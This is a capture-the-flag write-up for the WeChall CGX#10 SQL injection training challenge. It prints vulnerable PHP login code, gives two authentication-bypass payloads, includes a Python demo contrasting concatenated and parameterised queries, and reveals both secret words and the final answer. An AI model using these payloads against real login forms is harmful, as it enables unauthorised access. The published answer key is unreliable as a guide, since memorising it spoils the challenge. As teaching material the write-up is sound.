WeChall - CGX#10 - SQL Injection

Challenge

CGX#10 is a SQL injection training challenge in the Codegeex series. It has two login forms (mask1 / mask2), and each one must be injected separately to obtain a secret word. The challenge is described as a "training challenge" and is categorised under Training / Exploit / MySQL.

Solution

Problem #1

The source is in mask1.code:

$user = $_POST['username'];
$pass = md5($_POST['password']);
$query = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";
$result = mysqli_query($link, $query);
$userdata = mysqli_fetch_assoc($result);
if ($userdata) {
    echo "Welcome back, $user, Your first secret word is \"{$solution}\"";
}

The query is built by concatenating single-quoted strings with no filtering at all. The password goes through MD5, but that does not affect the injection: the quote can be closed inside username and the password check commented out:

username = admin' --
password = anything

A space is required after the "--". After a successful login the page shows the first secret word: silverbullet

Problem #2

mask2.code contains only one line of real code:

require 'solution2.php';

The source is not visible, but testing shows that this form uses double quotes as the string delimiter instead:

username = admin" OR "1"="1" --
password = anything

Closing the string with a double quote bypasses the check. After login the second secret word is shown: firestarter
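Added example (not the challenge's own code) showing why both mask1 and mask2 fall over: the same concatenation as mask1.code, with a delim parameter for the double-quoted variant of mask2, next to a parameterised login that treats the payload as plain data. It assumes an in-memory SQLite table with constructed users standing in for the challenge's MySQL database.

```python
import hashlib
import sqlite3

# Constructed sample users; the challenge's real table contents are not known.
USERS = [("admin", hashlib.md5(b"correct horse").hexdigest()),
         ("guest", hashlib.md5(b"guest").hexdigest())]


def make_db():
    """In-memory SQLite stand-in for the challenge's MySQL users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def build_query(user, password, delim="'"):
    """Mirror mask1.code: MD5 the password, then concatenate raw input.
    delim='"' reproduces the double-quoted query inferred for mask2."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return (f"SELECT * FROM users WHERE username = {delim}{user}{delim}"
            f" AND password = {delim}{pw_hash}{delim}")


def login_vulnerable(con, user, password):
    """Executes the concatenated query; a '--' in user comments out the rest."""
    row = con.execute(build_query(user, password)).fetchone()
    return row[0] if row else None


def login_hardened(con, user, password):
    """Parameterised version: quotes and '--' in user are just characters.
    MD5 is kept only to mirror the challenge; real code should use a
    slow salted hash such as bcrypt/argon2 instead."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (user, pw_hash)).fetchone()
    return row[0] if row else None
```

SQLite, unlike MySQL, does not need the space after "--", so the payload here works with or without it.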

Answer

Submit the two secret words concatenated:

silverbulletfirestarter